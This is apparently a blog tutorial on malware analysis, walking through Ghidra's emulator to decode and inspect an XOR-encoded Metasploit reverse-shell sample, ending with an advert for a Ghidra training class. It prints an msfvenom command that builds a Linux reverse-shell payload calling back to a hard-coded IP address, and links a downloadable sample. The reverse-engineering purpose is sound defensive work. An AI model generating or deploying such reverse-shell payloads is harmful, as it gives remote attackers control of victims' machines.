Unpacking Shellcode with Ghidra Emulator
It is a pretty common practice for malware authors to decode and execute payloads in memory to avoid detection and complicate analysis efforts. In this post, I will decode and start analyzing an XOR encoded Metasploit TCP reverse shell to give an example on how to get started with this using Ghidra to emulate the payload.
The sample for this post can be downloaded from https://secur3.us/GhidraFiles/payload or can be generated with msfvenom:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=104.236.191.89 -f elf -e x64/xor
The exercise begins by creating a new project in Ghidra and importing the sample file.
Opening the program in CodeBrowser and performing auto-analysis reveals the following listing:
Reading through this listing, we can see that it is loading the address of the entry function into RAX and then writing XOR results into a location 0x27 bytes into entry at 0x400093. We can see that 0x400078+0x27 brings us to 0x40009f which has already been flagged by Ghidra with a RW reference from the xor instruction at 0x400093. The decompiler output shows something similar and indicates that it encountered bad instruction data:
The program will run an XOR decoding loop to rewrite the program at runtime. This will transform those bad bytes into valid instructions. With this understanding of the code, we can open the program in the stand-alone Emulator tool and allow it to run the XOR loop by clicking Debugger->Emulate Program in New Trace (or by clicking the emulator icon).
The plan from here is to let it run through the decoding loop and then inspect the dynamic listing. Set an SW_EXECUTE breakpoint at 0x40009f to recognize when the loop has completed.
After setting the breakpoint, use the Emulator controls to resume execution (the resume/play icon works) and you should see control reach the breakpoint.
Switching to the Dynamic listing at this point (Window->Listing->Dynamic) shows that the bytes have been re-written.
We can now extract the decoded data into a program segment for independent analysis. This is achieved by highlighting the bytes and then using the Extract and Import… option in the right-click context menu from the selected bytes.
Notice that the dialogue asks, ‘Please select a language.’ This gives us the opportunity to select an alternate language selection for the extracted code.
I have selected the little-endian 64-bit x86 with gcc but of course we know that this was not compiled by gcc. Other lanaguage selections here may improve or degrade your analysis output.
After clicking OK on this prompt, click Yes to analyze the new segment:
The new segment is now included in the Ghidra project in a subfolder named after the program (payload).
Disassemble this by pressing ‘D’ to reveal the shellcode:
And then in the Decompile view:
The shellcode is using the SYSCALL instruction which is represented in Ghidra’s decompiler output as the generic syscall() instead of resolving to the specific Linux system call invoked. The decompiled view in this case does not contain enough information to understand the deobfuscated code. Fortunately, Ghidra ships with an example script demonstrating how to use a memory overlay to resolve syscall numbers to function placeholders so that we see appropriate names and signatures instead of syscall().
Open Script Manager from the Window menu and search for ‘SyscallsScript’ to find it:
Unfortunately, this script was not designed to be run on a program segment and does not like the available metadata. If you run the script you will get an error as follows:
Right-click the script and open it in the basic editor to apply a quick patch by commenting out the check as shown in the highlighted section below.
After adding the comments, you will need to save the script as a new name before it can be run:
Running the updated script and returning to the decompiled segment output, we see:
I will leave the rest of the analysis to the reader, but from here we can already see that the 4 syscalls have been renamed and given appropriate signatures for socket, connect, dup2, and execve which should give a pretty clear indication of what it is doing.
Join Me At Black Hat To Learn More
As always, I hope you have enjoyed reading this post. If you found this interesting and want to learn more, please consider joining me in Vegas this summer for ‘A Guide to Reversing with Ghidra’. The class is offered twice, Saturday/Sunday and Monday/Tuesday. Spaces are filling up quickly so please reserve your space today!
UPDATE 3/2/24: Registration is currently open for “A Basic Guide to Bug Hunting with Ghidra” at Black Hat USA 2024. The two day class will be offered August 3–4 and again August 5–6.